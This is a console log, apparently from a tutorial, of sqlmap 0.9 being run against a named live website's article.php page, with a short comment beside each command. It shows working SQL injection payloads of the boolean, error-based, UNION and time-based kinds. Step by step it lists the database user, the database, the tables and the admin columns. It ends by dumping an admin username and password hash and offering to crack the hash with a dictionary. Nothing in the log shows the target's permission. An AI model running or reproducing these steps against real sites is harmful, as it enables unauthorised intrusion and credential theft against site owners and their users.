D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* Note: get the current user name
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /* current database
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* get the table names of the current database
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /* get the column names of the admin table
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* get the contents of the columns
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

shutting down at: 16:58:14

D:\Python27\sqlmap>